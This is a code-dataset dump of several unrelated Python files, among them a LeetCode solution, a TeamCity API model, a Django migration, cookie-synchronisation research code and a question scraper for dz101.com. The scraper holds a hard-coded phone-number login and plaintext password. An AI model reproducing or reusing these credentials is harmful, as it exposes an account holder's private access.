blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
616
content_id
stringlengths
40
40
detected_licenses
listlengths
0
112
license_type
stringclasses
2 values
repo_name
stringlengths
5
115
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
777 values
visit_date
timestamp[us]date
2015-08-06 10:31:46
2023-09-06 10:44:38
revision_date
timestamp[us]date
1970-01-01 02:38:32
2037-05-03 13:00:00
committer_date
timestamp[us]date
1970-01-01 02:38:32
2023-09-06 01:08:06
github_id
int64
4.92k
681M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
22 values
gha_event_created_at
timestamp[us]date
2012-06-04 01:52:49
2023-09-14 21:59:50
gha_created_at
timestamp[us]date
2008-05-22 07:58:19
2023-08-21 12:35:19
gha_language
stringclasses
149 values
src_encoding
stringclasses
26 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
3
10.2M
extension
stringclasses
188 values
content
stringlengths
3
10.2M
authors
listlengths
1
1
author_id
stringlengths
1
132
727d16455790234bc5ad2fa656380bfc5a8ff77a
1852be4726dc1d83780740678819192277159e0f
/LC/97.py
4b43cefdb31dc175807adac8a7da8d074298f5c2
[ "MIT" ]
permissive
szhu3210/LeetCode_Solutions
f0a32e30df54b655fdb9c7d48622382f29781409
64747eb172c2ecb3c889830246f3282669516e10
refs/heads/master
2020-06-30T05:45:40.550146
2017-08-11T04:10:25
2017-08-11T04:10:25
74,389,515
2
0
null
null
null
null
UTF-8
Python
false
false
1,631
py
class Solution(object): def isInterleave(self, s1, s2, s3): """ :type s1: str :type s2: str :type s3: str :rtype: bool """ ## iterative (DP) (35ms) l1=len(s1) l2=len(s2) l3=len(s3) co=[(-1,-1)] x=0 while x<l3 and co: nco=[] for c in co: if c[0]<l1-1 and s3[x]==s1[c[0]+1] and (c[0]+1,c[1]) not in nco: nco.append((c[0]+1,c[1])) if c[1]<l2-1 and s3[x]==s2[c[1]+1] and (c[0],c[1]+1) not in nco: nco.append((c[0],c[1]+1)) co=nco x+=1 return (l1-1,l2-1) in co ## recursive (keep historical record) (68ms) # d={} # return self.helper(s1,s2,s3,d) # def helper(self, s1,s2,s3,d): # if len(s1)+len(s2)!=len(s3): # return False # if (s1,s2,s3) in d: # return False # if s1=='': # t = s2==s3 # if t: # return True # else: # d[(s1,s2,s3)]=t # return False # if s2=='': # t = s1==s3 # if t: # return True # else: # d[(s1,s2,s3)]=t # return False # t1 = self.helper(s1[1:],s2,s3[1:],d) if s3[0]==s1[0] else False # if t1: # return True # t2 = self.helper(s1,s2[1:],s3[1:],d) if s3[0]==s2[0] else False # if t2: # return True # d[(s1,s2,s3)]=False # return False
[ "szhu@email.arizona.edu" ]
szhu@email.arizona.edu
ec1b3f7c328d034d94959ab8c0c4ca7566c4ba57
03f1560cedc273f99d64a93224fe7a2211aa5680
/src/vsc/report/coverage_report.py
510e26b55a5197191af6e48a1e4d499269a02eb5
[ "Apache-2.0" ]
permissive
cmarqu/pyvsc
9be19fbcd3df37a406ecaa1cdf46b5209e9e9866
c7ff708256b7cdce0eccab8b7d6e2037edbdc5fa
refs/heads/master
2021-06-14T07:19:25.381354
2020-04-08T01:50:49
2020-04-08T01:50:49
254,485,300
0
0
Apache-2.0
2020-04-09T21:47:58
2020-04-09T21:47:57
null
UTF-8
Python
false
false
1,100
py
''' Created on Mar 25, 2020 @author: ballance ''' from typing import List class CoverageReport(object): """Coverage report in object-model form. Converted to text for display""" def __init__(self): self.covergroups : List['CoverageReport.Covergroup'] = [] class Coveritem(object): def __init__(self, name): self.name = name self.coverage = 0.0 class Covergroup(Coveritem): def __init__(self, name : str, is_type : bool): CoverageReport.Coveritem.__init__(self, name) self.is_type = is_type self.covergroups = [] self.coverpoints = [] self.crosses = [] class Coverpoint(Coveritem): def __init__(self, name : str): CoverageReport.Coveritem.__init__(self, name) self.bins = [] class Coverbin(Coveritem): def __init__(self, name : str, n_hits): CoverageReport.Coveritem.__init__(self, name) self.n_hits = n_hits
[ "matt.ballance@gmail.com" ]
matt.ballance@gmail.com
21c40f16baa986546f9ac952a9717fba5b578383
8e576efb1b76a038cf7e7ec631eb33db9f1c0155
/continue_debug.py
9ca606d666a9cec932b2851b03fb61c42c2edf8a
[]
no_license
sugar-activities/4378-activity
779ec91bb60f05c617edb5b5393fe95b454a9b71
eedab96fc1bf541983eb66f0aaf417d767cc0df7
refs/heads/master
2021-01-19T23:14:24.238128
2017-04-21T05:52:23
2017-04-21T05:52:23
88,937,226
0
0
null
null
null
null
UTF-8
Python
false
false
4,823
py
#!/usr/bin/env python # # Copyright (C) 2007, Red Hat, Inc. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA from __future__ import with_statement import os import sys #debug tool to analyze the activity environment # Initialize logging. import logging from pydebug_logging import _logger, log_environment _logger.setLevel(logging.DEBUG) from sugar.activity import activityfactory from sugar.bundle.activitybundle import ActivityBundle #define the interface with the GUI from Rpyc import * try: c = SocketConnection('localhost') db = c.modules.pydebug.pydebug_instance except AttributeError: print('cannot connect to localhost') except e: print(e[1]) assert False #define interface with the command line ipython instance from IPython.core import ipapi ip = ipapi.get() global __IPYTHON__ try: __IPYTHON__ print('IPTHON is defined') except: __IPYTHON__ = ip o = ip.options o.xmode = db.traceback def edit_glue(self,filename,linenumber): _logger.debug('position to editor file:%s. Line:%d'%(filename,linenumber)) ip.set_hook('editor',edit_glue) def sync_called(self,filename,line,col): print('synchronize called. file:%s. line:%s. 
Col:%s'%(filename,line,col)) ip.set_hook('synchronize_with_editor',sync_called) #get the information about the Activity we are about to debug child_path = db.child_path _logger.debug('child path: %s'%child_path) print('child path starting activity: %s'%child_path) go_cmd = 'run -d -b %s %s'%(os.path.join(db.pydebug_path,'bin','start_debug.py'),child_path) _logger.debug('defining go: %s'%go_cmd) ip.user_ns['go'] = go_cmd _logger.debug('pydebug home: %s'%db.debugger_home) path = child_path pydebug_home = db.debugger_home os.environ['PYDEBUG_HOME'] = pydebug_home os.chdir(path) os.environ['SUGAR_BUNDLE_PATH'] = path _logger.debug('sugar_bundle_path set to %s'%path) #set up module search path sys.path.insert(0,path) activity = ActivityBundle(path) cmd_args = activityfactory.get_command(activity) _logger.debug('command args:%r'%cmd_args) bundle_name = activity.get_name() bundle_id = activity.get_bundle_id() #need to get activity root, but activity bases off of HOME which some applications need to change #following will not work if storage system changes with new OS #required because debugger needs to be able to change home so that foreign apps will work activity_root = os.path.join('/home/olpc/.sugar/default/',bundle_id) os.environ['SUGAR_ACTIVITY_ROOT'] = activity_root _logger.debug('sugar_activity_root set to %s'%activity_root) #following is useful for its side-effects info = activityfactory.get_environment(activity) _logger.debug("Command to execute:%s."%cmd_args[0]) if not cmd_args[0].startswith('sugar-activity'): target = os.path.join(pydebug_home,os.path.basename(cmd_args[0])) with open(target,'w') as write_script_fd: with open(cmd_args[0],'r') as read_script_fd: for line in read_script_fd.readlines(): if line.startswith('exec') or line.startswith('sugar-activity'): pass else: write_script_fd.write(line) line = 'export -p > %s_env\n'%target write_script_fd.write(line) #write the environment variables to another file write_script_fd.close() os.chmod(target,0755) 
os.system(target) _logger.debug('writing env script:%s'%target) #read the environment back into the current process with open('%s_env'%target,'r') as env_file: env_dict = {} for line in env_file.readlines(): if not line.startswith('export'): pass payload = line.split()[1] pair = payload.split('=') if len(pair)> 1: key = pair[0] value = pair[1] env_dict[key] = value _logger.debug('reading environment. %s => %s'%(key,value,)) os.environ = env_dict more_args = ['-a',bundle_name,'-b',bundle_id] sys.argv = cmd_args[:2] + more_args _logger.debug('about to call main.main() with args %r'%sys.argv) log_environment() from sugar.activity import main main.main()
[ "ignacio@sugarlabs.org" ]
ignacio@sugarlabs.org
42464cf07abf0758db1a5c82e682019c368ab0cf
2e50af6e12bf1c815c8efb3695a5bb41507d66bd
/ppomppu/crawling_data/migrations/0001_initial.py
23053b1d9b999d1506fdd26719ba032e71a32c7e
[]
no_license
KimDoKy/Ppomppu_check
e5fe57ba2bed84e4236742bfc4352460b7313f89
b7d09ac1ab46d051636f54b5890f190b3ad97419
refs/heads/master
2022-12-15T10:42:10.717898
2021-06-22T12:46:20
2021-06-22T12:46:20
167,160,601
2
1
null
2022-12-08T01:48:49
2019-01-23T10:01:49
JavaScript
UTF-8
Python
false
false
871
py
# Generated by Django 2.1.5 on 2019-01-30 14:50 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='CrawlingData', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.TextField()), ('category', models.CharField(max_length=10)), ('write_date', models.CharField(max_length=10)), ('detail_link', models.URLField()), ('prod_image', models.URLField(blank=True, null=True)), ('crawling_data', models.DateTimeField(auto_now_add=True)), ('status', models.BooleanField(default=False)), ], ), ]
[ "makingfunk0@gmail.com" ]
makingfunk0@gmail.com
d64e9569c2249f8d5cf47948bb273030c95f0a6c
a14b3e43705d74da97451de8663e9a98c088aec3
/dohq_teamcity/models/vcs_roots.py
1fe9c882557685c3fed4ad0ab2c3b8e4d637f5b0
[ "MIT" ]
permissive
devopshq/teamcity
b5a36d6573cdde2f7c72e77a8e605198a7c7124d
7a73e05c0a159337ed317f8b8d8072e478a65ca6
refs/heads/develop
2023-01-16T07:06:07.514297
2022-12-30T10:24:07
2022-12-30T10:24:07
153,228,762
29
13
MIT
2023-09-08T08:49:56
2018-10-16T05:42:15
Python
UTF-8
Python
false
false
3,982
py
# coding: utf-8 from dohq_teamcity.custom.base_model import TeamCityObject # from dohq_teamcity.models.vcs_root import VcsRoot # noqa: F401,E501 class VcsRoots(TeamCityObject): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'count': 'int', 'href': 'str', 'next_href': 'str', 'prev_href': 'str', 'vcs_root': 'list[VcsRoot]' } attribute_map = { 'count': 'count', 'href': 'href', 'next_href': 'nextHref', 'prev_href': 'prevHref', 'vcs_root': 'vcs-root' } def __init__(self, count=None, href=None, next_href=None, prev_href=None, vcs_root=None, teamcity=None): # noqa: E501 """VcsRoots - a model defined in Swagger""" # noqa: E501 self._count = None self._href = None self._next_href = None self._prev_href = None self._vcs_root = None self.discriminator = None if count is not None: self.count = count if href is not None: self.href = href if next_href is not None: self.next_href = next_href if prev_href is not None: self.prev_href = prev_href if vcs_root is not None: self.vcs_root = vcs_root super(VcsRoots, self).__init__(teamcity=teamcity) @property def count(self): """Gets the count of this VcsRoots. # noqa: E501 :return: The count of this VcsRoots. # noqa: E501 :rtype: int """ return self._count @count.setter def count(self, count): """Sets the count of this VcsRoots. :param count: The count of this VcsRoots. # noqa: E501 :type: int """ self._count = count @property def href(self): """Gets the href of this VcsRoots. # noqa: E501 :return: The href of this VcsRoots. # noqa: E501 :rtype: str """ return self._href @href.setter def href(self, href): """Sets the href of this VcsRoots. :param href: The href of this VcsRoots. 
# noqa: E501 :type: str """ self._href = href @property def next_href(self): """Gets the next_href of this VcsRoots. # noqa: E501 :return: The next_href of this VcsRoots. # noqa: E501 :rtype: str """ return self._next_href @next_href.setter def next_href(self, next_href): """Sets the next_href of this VcsRoots. :param next_href: The next_href of this VcsRoots. # noqa: E501 :type: str """ self._next_href = next_href @property def prev_href(self): """Gets the prev_href of this VcsRoots. # noqa: E501 :return: The prev_href of this VcsRoots. # noqa: E501 :rtype: str """ return self._prev_href @prev_href.setter def prev_href(self, prev_href): """Sets the prev_href of this VcsRoots. :param prev_href: The prev_href of this VcsRoots. # noqa: E501 :type: str """ self._prev_href = prev_href @property def vcs_root(self): """Gets the vcs_root of this VcsRoots. # noqa: E501 :return: The vcs_root of this VcsRoots. # noqa: E501 :rtype: list[VcsRoot] """ return self._vcs_root @vcs_root.setter def vcs_root(self, vcs_root): """Sets the vcs_root of this VcsRoots. :param vcs_root: The vcs_root of this VcsRoots. # noqa: E501 :type: list[VcsRoot] """ self._vcs_root = vcs_root
[ "allburov@gmail.com" ]
allburov@gmail.com
defa0295f0381cbdb2f43c562eabaa220ee5df58
f8e8d0e3820eb6fd25d3ce621686316ce196c4d0
/Cookie Synchronization/ccs_sync_measurements.py
641962026495bda938f5f99f4b04cc4b779b6d14
[ "MIT" ]
permissive
amirunpri2018/Web-Tracking-in-Indian-Partisan-News-Websites
511b0345fde3cd01473f4918c9e6b82d5bc8c20e
f68c4ae011a499c0519bed0b0cb953a12f438902
refs/heads/main
2023-04-29T12:31:41.879296
2021-05-24T19:27:23
2021-05-24T19:27:23
null
0
0
null
null
null
null
UTF-8
Python
false
false
12,894
py
''' This is the primary code for computing cookie-synchronization across different pairs of websites within each crawl ''' import extract_cookie_ids import extract_id_knowledge import census_util import find_site_leaning import classify_domains from collections import defaultdict import sqlite3 as lite import queue import re import os import numpy import csv # Global Aggregation Variables global_known_ids = {} global_id_to_domain_map = defaultdict(list) global_id_to_cookie_map = defaultdict(list) # Path of the OpenWPM Dara DATA_DIR = os.path.join(os.path.abspath(os.pardir),'OpenWPM Crawls') # BFS HOP ANALYSIS # for a given domain, returns a sorted list of sites within <hops> steps away in the sync graph def build_hop_neighborhood(seed_domain, hop, domain_to_id, id_to_domain): domains_explored = set() # list of domains we've visited search_queue = queue.Queue() # list of the sites that we'll be visiting search_queue.put((seed_domain, 0)) # seeds the search with the initial domain # performs the BFS neighborhood search while not search_queue.empty(): curr_domain, curr_depth = search_queue.get() # break the search if the nodes are too far away if curr_depth > hop: break # don't explore the node if we've already seen it if curr_domain in domains_explored: continue domains_explored.add(curr_domain) # don't expand out to neighbors if we are at the edge of the neighborhood if curr_depth == hop: continue # update the search queue for cookie_id in domain_to_id[curr_domain]: for domain in id_to_domain[cookie_id]: search_queue.put((domain, curr_depth + 1)) neighborhood = list(domains_explored) neighborhood.sort() return neighborhood # OVERALL COOKIE SYNC SCRIPT # prints off the relevant statistics for the cookie syncing studies, given two crawl databases # <db_to_analyze> specifies whether to extract from db1 or db2 def output_sync_measurements(db1, visit_id1, db2, visit_id2, db_to_analyze=1): global global_known_ids global global_id_to_domain_map global 
global_id_to_cookie_map print("Extracting persistent identifiers from each crawl...") # extract the cookie ids on a per-database basis cookies_db1 = extract_cookie_ids.extract_persistent_ids_from_dbs([db1], visit_id1) cookies_db2 = extract_cookie_ids.extract_persistent_ids_from_dbs([db2], visit_id2) print("Grabbing cookies...") # get the cookies that appear to be consistent ids and extract their values from db1 id_cookies = extract_cookie_ids.extract_common_id_cookies([cookies_db1, cookies_db2]) if db_to_analyze == 1: domain_to_fp_map = census_util.build_domain_map(db1, visit_id1) known_ids = extract_cookie_ids.extract_known_cookies_from_db(db1, id_cookies, visit_id1) else: domain_to_fp_map = census_util.build_domain_map(db2, visit_id2) known_ids = extract_cookie_ids.extract_known_cookies_from_db(db2, id_cookies, visit_id2) # remove known opt-out cookie strings for key in known_ids.keys(): if (known_ids[key] == '0' \ or known_ids[key] == '00000000-0000-0000-0000-000000000000' \ or known_ids[key] == '0000000000000000' \ or known_ids[key] == 'AAAAAAAAAAAAAAAAAAAAAA'): del known_ids[key] # Creating Global version for known_ids for key in known_ids.keys(): if key not in global_known_ids.keys(): global_known_ids[key] = [] global_known_ids[key].append(known_ids[key]) else: if known_ids[key] not in global_known_ids[key]: global_known_ids[key].append(known_ids[key]) global_id_to_cookie_map = extract_cookie_ids.map_list_of_ids_to_cookies(global_known_ids) print("Build mapping between cookies, domains, and first parties...") # build the three maps that are most fundamental to the analysis id_to_cookie_map = extract_cookie_ids.map_ids_to_cookies(known_ids) id_to_cookie_map_pruned = census_util.prune_list_dict(id_to_cookie_map) if db_to_analyze == 1: id_to_domain_map = extract_id_knowledge.build_id_knowledge_dictionary(defaultdict(list), id_to_cookie_map, db1, visit_id1) global_id_to_domain_map = extract_id_knowledge.build_id_knowledge_dictionary(global_id_to_domain_map, 
global_id_to_cookie_map, db1, visit_id1) else: id_to_domain_map = extract_id_knowledge.build_id_knowledge_dictionary(defaultdict(list), id_to_cookie_map, db2, visit_id2) global_id_to_domain_map = extract_id_knowledge.build_id_knowledge_dictionary(global_id_to_domain_map, global_id_to_cookie_map, db2, visit_id2) id_to_domain_map = census_util.prune_list_dict(id_to_domain_map) domain_to_id_map = extract_id_knowledge.map_domains_to_known_ids(id_to_domain_map) domain_to_id_map_pruned = census_util.prune_list_dict(domain_to_id_map) print("Dumping results...") # ID and # of domains with knowledge of it id_to_domain_counts = census_util.sort_tuples([(key, len(id_to_domain_map[key])) for key in id_to_domain_map]) # print(id_to_domain_counts) id_to_dm = list() for x in id_to_domain_counts: id_to_dm.append(x[1]) # print(str(x[0]) + "\t" + str(x[1])) # Domain and IDs that it has knowledge of:") domain_to_id_counts = census_util.sort_tuples([(key, len(domain_to_id_map[key])) for key in domain_to_id_map]) # print(domain_to_id_counts) dm_to_id = list() for domain, count in domain_to_id_counts: neigh1 = build_hop_neighborhood(domain, 1, domain_to_id_map, id_to_domain_map) depth1 = len(neigh1) num_doms1 = len(census_util.get_values_from_keys(neigh1, domain_to_fp_map)) neigh2 = build_hop_neighborhood(domain, 2, domain_to_id_map, id_to_domain_map) depth2 = len(neigh2) num_doms2 = len(census_util.get_values_from_keys(neigh2, domain_to_fp_map)) dm_to_id.append(count) # print(str(domain) + "\t" + str(count) + "\t" + str(depth1) + "\t" + str(num_doms1) + "\t" + str(depth2) + "\t" + str(num_doms2)) a = str(len(id_to_cookie_map)) b = str(len(known_ids)) c = str(len(id_to_domain_map)) id_cookies_in_sync = [cookie for key in id_to_domain_map for cookie in id_to_cookie_map[key]] d = str(len(list(set(id_cookies_in_sync)))) e = str(len(domain_to_id_map)) if len(dm_to_id) == 0: f = "0 | 0 | 0 | 0 " else: f = str(min(dm_to_id)) + " | " + str(round(numpy.mean(dm_to_id), 2)) + ' | ' + 
str(round(numpy.median(dm_to_id), 2)) + " | " + str(max(dm_to_id)) if len(id_to_dm) == 0: g = "0 | 0 | 0 | 0 " else: g = str(min(id_to_dm)) + " | " + str(round(numpy.mean(id_to_dm), 2)) + ' | ' + str(round(numpy.median(id_to_dm), 2)) + " | " + str(max(id_to_dm)) return a, b, c, d, e, f, g # The below codes does the same things as done by output_sync_measurements() function # and produces an aggregate value for all website pairs if __name__ == "__main__": # Enter location of the file (crawl_file.sqlite) currently being run Stateful_Crawl = os.path.join(DATA_DIR, 'crawl-data_stateful_homepage1.sqlite') data_folder_path = os.path.join(os.path.abspath(os.pardir)) # Enter name of the political groups being studied currently (Eg. LEFT-RIGHT) file_path = os.path.join(os.path.join(data_folder_path, 'Cookie Synchronization Analysis'), 'CS RIGHT-RIGHT Analysis.csv') writer = csv.writer(open(file_path, 'w', newline='')) writer.writerow(['Website1', 'Leaning_of_Website1', 'Website2', 'Leaning_of_Website2', 'No_of_IDs', 'No_of_ID_Cookies', 'No_of_IDs_in_Sync', 'No_of_ID_Cookies_in_Sync', 'No_of_Domains_in_Sync', 'IDs_known_per_Party (Min | Mean | Median | Max)', 'Parties_knowing_an_ID (Min | Mean | Median | Max)']) conn = lite.connect(Stateful_Crawl) cur = conn.cursor() # Choosing website pairs to dtudy once-by-onne for site1 in range(1, 123): for res in cur.execute('SELECT arguments FROM crawl_history'+' WHERE visit_id = '+str(site1)): site1_url = str(res[0]).split(',')[0][9:-1] site1_leaning = find_site_leaning.get_leaning(site1_url) if site1_leaning not in ['RIGHT']: # ['RIGHT', 'LEFT', 'CENTRE']: continue for site2 in range(site1+1, 124): print(site1) for res in cur.execute('SELECT arguments FROM crawl_history'+' WHERE visit_id = '+str(site2)): site2_url = str(res[0]).split(',')[0][9:-1] site2_leaning = find_site_leaning.get_leaning(site2_url) if site2_leaning not in ['RIGHT']: # ['RIGHT', 'LEFT', 'CENTRE']: continue # print(site1, site1_url, site2, site2_url) a, b, c, d, 
e, f, g = output_sync_measurements(Stateful_Crawl, site1, Stateful_Crawl, site2) writer.writerow([site1_url, site1_leaning, site2_url, site2_leaning, a, b, c, d, e, f, g]) # Compute same things as above but this time for global variables global_id_to_domain_map = census_util.prune_list_dict(global_id_to_domain_map) global_domain_to_id_map = extract_id_knowledge.map_domains_to_known_ids(global_id_to_domain_map) global_id_to_domain_counts = census_util.sort_tuples([(key, len(global_id_to_domain_map[key])) for key in global_id_to_domain_map]) print(global_id_to_domain_counts) global_id_to_dm = list() for x in global_id_to_domain_counts: global_id_to_dm.append(x[1]) print(str(x[0]) + ", " + str(x[1])) global_domain_to_id_counts = census_util.sort_tuples([(key, len(global_domain_to_id_map[key])) for key in global_domain_to_id_map]) global_dm_to_id = list() for domain, count in global_domain_to_id_counts: global_dm_to_id.append(count) global_id_cookies_in_sync = [cookie for key in global_id_to_domain_map for cookie in global_id_to_cookie_map[key]] fp, tp = classify_domains.get_fp_tp_counts(global_domain_to_id_map) print("\n===========================================================================================\n") print("\n################################## ID TO COOKIE MAP #######################################\n") print(global_id_to_cookie_map) print("\n===========================================================================================\n") print("\n===========================================================================================\n") print("\n###################################### KNOWN IDs ##########################################\n") print(global_known_ids) print("\n===========================================================================================\n") print("\n===========================================================================================\n") print("\n################################## ID TO DOMAIN MAP 
#######################################\n") print(global_id_to_domain_map) print("\n===========================================================================================\n") print("\n===========================================================================================\n") print("\n################################## DOMAIN TO ID MAP #######################################\n") print(global_domain_to_id_map) print("\n===========================================================================================\n") # AGGREGATED STATS print("\n\n\n===========================================================================================") print("\nAggregated Summary statistics:") print("NUMBER OF IDs: " + str(len(global_id_to_cookie_map))) print("NUMBER OF ID COOKIES: " + str(len(global_known_ids))) print("NUMBER OF IDs IN SYNCS: " + str(len(global_id_to_domain_map))) print("NUMBER OF ID COOKIES IN SYNC: " + str(len(list(set(global_id_cookies_in_sync))))) print("NUMBER OF DOMAINS IN SYNC: " + str(len(global_domain_to_id_map))) print("NUMBER OF FP DOMAINS IN SYNC: " + str(fp)) print("NUMBER OF TP DOMAINS IN SYNC: " + str(tp)) print(" Min | Mean | Median | Max") print("IDs KNOWN PER PARTY : " + str(min(global_dm_to_id)) + " | " + str(round(numpy.mean(global_dm_to_id), 2)) + " | " + str(round(numpy.median(global_dm_to_id), 2)) + " | " + str(max(global_dm_to_id))) print("PARTIES KNOWING AN ID : " + str(min(global_id_to_dm)) + " | " + str(round(numpy.mean(global_id_to_dm), 2)) + " | " + str(round(numpy.median(global_id_to_dm), 2)) + " | " + str(max(global_id_to_dm))) print("\n===========================================================================================\n\n\n")
[ "noreply@github.com" ]
amirunpri2018.noreply@github.com
4614138089e9786f27b020db0dca4e5c32f2cf16
f160d992d0ea5fa4e36af0025b5637c8962f2a29
/dz101_spider/questions/mini_spider/dz101_question_mini_spider.py
f38e3cf331ad1a52bb4a38d8cdce2becab852b51
[]
no_license
Zachypentakill/Afanti_tiku
369dde43a32cecb136eb1207bf4223f6decd9843
aebee5b3d8dce76f95620cb52fda5a0f19965945
refs/heads/master
2021-07-11T15:59:03.099600
2017-10-11T10:27:43
2017-10-11T10:27:43
null
0
0
null
null
null
null
UTF-8
Python
false
false
7,615
py
# -*- coding: utf-8 -*- import asyncio import logging import json from achihuo_mini.async_loop import AsyncLoop from achihuo_mini.item import Item from afanti_tiku_lib.utils import md5_string from afanti_tiku_lib.dbs.mysql_pool import CommonMysql from afanti_tiku_lib.dbs import html_archive from afanti_tiku_lib.dbs.execute import execute from afanti_tiku_lib.html.extract import get_html_element from adsl_server.proxy import Proxy from login import login LOGGING_FORMAT = '%(asctime)-15s:%(levelname)s: %(message)s' logging.basicConfig(format=LOGGING_FORMAT, level=logging.INFO, filename='working/achihuo_mini.log', filemode='a') mysql = CommonMysql('html_archive2') mysql_conn = mysql.connection() _proxy = Proxy() INFOS = ( {'key': '初中语文', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 189, 'subj': '初中语文', 'aft_subj_id': 1,}, {'key': '初中数学', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 193, 'subj': '初中数学', 'aft_subj_id': 2,}, {'key': '初中英语', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 194, 'subj': '初中英语', 'aft_subj_id': 3,}, {'key': '初中物理', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 195, 'subj': '初中物理', 'aft_subj_id': 5,}, {'key': '初中化学', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 196, 'subj': '初中化学', 'aft_subj_id': 6,}, {'key': '初中生物', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 197, 'subj': '初中生物', 'aft_subj_id': 9,}, {'key': '初中政治', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 198, 'subj': '初中政治', 'aft_subj_id': 10,}, {'key': '初中历史', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 199, 'subj': '初中历史', 'aft_subj_id': 8,}, {'key': '初中地理', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 200, 'subj': '初中地理', 'aft_subj_id': 7,}, {'key': '高中语文', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 109, 'subj': '高中语文', 'aft_subj_id': 21,}, {'key': '高中数学', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 161, 'subj': '高中数学', 'aft_subj_id': 22,}, {'key': '高中英语', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 165, 'subj': '高中英语', 
'aft_subj_id': 23,}, {'key': '高中物理', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 166, 'subj': '高中物理', 'aft_subj_id': 25,}, {'key': '高中化学', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 167, 'subj': '高中化学', 'aft_subj_id': 26,}, {'key': '高中生物', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 168, 'subj': '高中生物', 'aft_subj_id': 29,}, {'key': '高中政治', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 169, 'subj': '高中政治', 'aft_subj_id': 30,}, {'key': '高中历史', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 170, 'subj': '高中历史', 'aft_subj_id': 28,}, {'key': '高中地理', 'grade': '全部', 'limit': 100, 'skip':0, 'subj_id': 171, 'subj': '高中地理', 'aft_subj_id': 27,}, ) PARAM = ('Key={key}&Subject={subj}&QuestionTypes=&Difficulty=&Year=' '&Grade={grade}&Type=&Area=&subject_id={subj_id}' '&Limit={limit}&Skip={skip}') INTERNAL = 2 * 24 * 60 * 60 class Dz101QuestionMiniSpider(AsyncLoop): NAME = 'dz101_question_mini_spider' def __init__(self): super(Dz101QuestionMiniSpider, self).__init__(concurrency=2, cache_backend='ssdb') self.cookies = login('15542652940', 'www888xxx') async def run(self): for info in INFOS: asyncio.ensure_future(self.get_pages(info)) async def get_pages(self, info): no_new_question = 0 page_num = 0 N = 0 while True: if no_new_question > 30: no_new_question = 0 page_num = 0 await asyncio.sleep(INTERNAL) continue ninfo = dict(info) ninfo['skip'] = page_num * 100 item = make_page_item(ninfo) logging.info('[get_pages]: {}, {}'.format(info['key'], page_num)) item.proxy = 'http://' + '119.7.227.133:9990' # _proxy.get(server_id=105) item.cookies = self.cookies with await self.lock: await asyncio.sleep(10) resp = await self.async_web_request(item, check_html=check_pg) if not (resp and resp.content): continue html_string = resp.text if not N: s = html_string.rfind('</div>|*|') + len('</div>|*|') e = html_string.find('|', s) qs_num = html_string[s:e] if not qs_num: logging.warn('not qs_num: {}'.format( json.dumps(item.json(), ensure_ascii=False))) continue N = 
int(qs_num) + 100 if page_num * 100 > N: await asyncio.sleep(INTERNAL) continue questions = get_html_element( '<div [^<>]*class="Problems_item"', html_string, regex=True ) has_qs = False for qs in questions: s = qs.find('<tt>') + 4 e = qs.find('</tt>') qid = qs[s:e] hkey = 'dz101_question_{}'.format(qid) if is_archived(hkey): continue has_qs = True logging.info('[question]: {}, {}'.format(info['key'], hkey)) save_html(hkey, qs, ninfo['aft_subj_id'], ninfo) if not has_qs: no_new_question += 1 else: no_new_question = 0 page_num += 1 logging.info('[page done]') def make_page_item(info): url = 'http://www.dz101.com/zujuan/zhishidian/Problems' item = Item(dict( method = 'GET', url = url + '?' + PARAM.format(**info), max_retry = 2, timeout = 120, )) return item def check_pg(html_string): return 'class="Problems_item"' in html_string def get_mysql_connection(): global mysql global mysql_conn try: if mysql_conn.ping() is False: mysql_conn = mysql.connection() return mysql_conn except Exception: mysql_conn = mysql.connection() return mysql_conn def save_html(url, html_string, subj_id, info, flag=0): mysql_conn = get_mysql_connection() info = json.dumps(info, ensure_ascii=False) sql, vals = html_archive.insert_sql( 'dz101_spider_html_archive_table', dict( key = url, html = html_string, md5 = md5_string(html_string), subject = subj_id, source = 56, flag=flag, info = info, ), ignore=True ) execute(mysql_conn, sql, values=vals) def is_archived(url): mysql_conn = get_mysql_connection() cmd = 'select html_id from dz101_spider_html_archive_table where `key` = %s and flag = 0' result = execute(mysql_conn, cmd, values=(url,)) if result: return True else: return False # cmd = 'select question_id from question_pre.question where spider_url = %s and flag = 0' # result = execute(mysql_conn, cmd, values=(url,)) # if result: # result = True # else: # result = False if __name__ == '__main__': loop = Dz101QuestionMiniSpider() loop.start()
[ "yanfeng.li@lejent.com" ]
yanfeng.li@lejent.com
50635945d92a8a30c541386a94cb0d6921c5d146
